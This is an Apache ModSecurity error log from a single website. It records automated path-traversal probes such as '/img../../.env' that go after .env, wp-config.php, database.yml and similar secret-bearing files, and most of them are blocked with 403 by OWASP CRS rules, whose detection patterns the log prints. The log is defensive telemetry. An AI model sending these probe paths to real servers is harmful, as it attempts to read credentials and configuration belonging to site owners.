[tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKprtr1yOh9Tvizezit2QAAAEc"]
[Tue May 12 06:16:46.260143 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKprtr1yOh9Tvizezit2QAAAEc"]
[Tue May 12 06:16:46.598586 2026] [core:error] [pid 1808852:tid 1808865] [client 45.148.10.238:65248] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 06:16:46.689672 2026] [core:error] [pid 1844863:tid 1844891] [client 45.148.10.238:65262] AH10244: invalid URI path (/files../../../../.env)
[Tue May 12 06:16:46.752036 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKprtr1yOh9Tvizezit2QAAAEc"]
[Tue May 12 06:16:46.776536 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKprtr1yOh9Tvizezit2wAAAEc"]
[Tue May 12 06:16:46.776732 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKprtr1yOh9Tvizezit2wAAAEc"]
[Tue May 12 06:16:47.025312 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKprxfeipD4uoG21FpAPQAAAAc"]
[Tue May 12 06:16:47.025600 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKprxfeipD4uoG21FpAPQAAAAc"]
[Tue May 12 06:16:47.098359 2026] [core:error] [pid 1820198:tid 1820212] [client 45.148.10.238:65268] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 06:16:47.260946 2026] [core:error] [pid 1825287:tid 1825318] [client 45.148.10.238:65276] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 06:16:47.290873 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKprtr1yOh9Tvizezit2wAAAEc"]
[Tue May 12 06:16:47.315083 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpr9r1yOh9Tvizezit3AAAAEc"]
[Tue May 12 06:16:47.315286 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpr9r1yOh9Tvizezit3AAAAEc"]
[Tue May 12 06:16:47.513196 2026] [security2:error] [pid 1808852:tid 1808862] [client 45.148.10.166:7166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKprxfeipD4uoG21FpAPQAAAAc"]
[Tue May 12 06:16:47.787331 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpr9r1yOh9Tvizezit3AAAAEc"]
[Tue May 12 06:16:47.812638 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpr9r1yOh9Tvizezit3QAAAEc"]
[Tue May 12 06:16:47.812710 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpr9r1yOh9Tvizezit3QAAAEc"]
[Tue May 12 06:16:47.812875 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpr9r1yOh9Tvizezit3QAAAEc"]
[Tue May 12 06:16:48.286393 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpr9r1yOh9Tvizezit3QAAAEc"]
[Tue May 12 06:16:48.311279 2026] [core:error] [pid 1825179:tid 1825205] [client 45.148.10.166:13848] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 06:16:48.982302 2026] [core:error] [pid 1844863:tid 1844876] [client 45.148.10.166:30312] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 06:16:49.543239 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpsRfeipD4uoG21FpARgAAABI"]
[Tue May 12 06:16:49.543319 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpsRfeipD4uoG21FpARgAAABI"]
[Tue May 12 06:16:49.543491 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpsRfeipD4uoG21FpARgAAABI"]
[Tue May 12 06:16:50.023947 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpsRfeipD4uoG21FpARgAAABI"]
[Tue May 12 06:16:50.052513 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpshfeipD4uoG21FpASQAAABI"]
[Tue May 12 06:16:50.052592 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpshfeipD4uoG21FpASQAAABI"]
[Tue May 12 06:16:50.052764 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpshfeipD4uoG21FpASQAAABI"]
[Tue May 12 06:16:50.535423 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpshfeipD4uoG21FpASQAAABI"]
[Tue May 12 06:16:50.564099 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpshfeipD4uoG21FpASwAAABI"]
[Tue May 12 06:16:50.564168 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpshfeipD4uoG21FpASwAAABI"]
[Tue May 12 06:16:50.564334 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpshfeipD4uoG21FpASwAAABI"]
[Tue May 12 06:16:51.059321 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpshfeipD4uoG21FpASwAAABI"]
[Tue May 12 06:16:51.087693 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpsxfeipD4uoG21FpATgAAABI"]
[Tue May 12 06:16:51.087910 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpsxfeipD4uoG21FpATgAAABI"]
[Tue May 12 06:16:51.561175 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpsxfeipD4uoG21FpATgAAABI"]
[Tue May 12 06:16:51.593554 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpsxfeipD4uoG21FpAUQAAABI"]
[Tue May 12 06:16:51.593758 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpsxfeipD4uoG21FpAUQAAABI"]
[Tue May 12 06:16:52.065930 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpsxfeipD4uoG21FpAUQAAABI"]
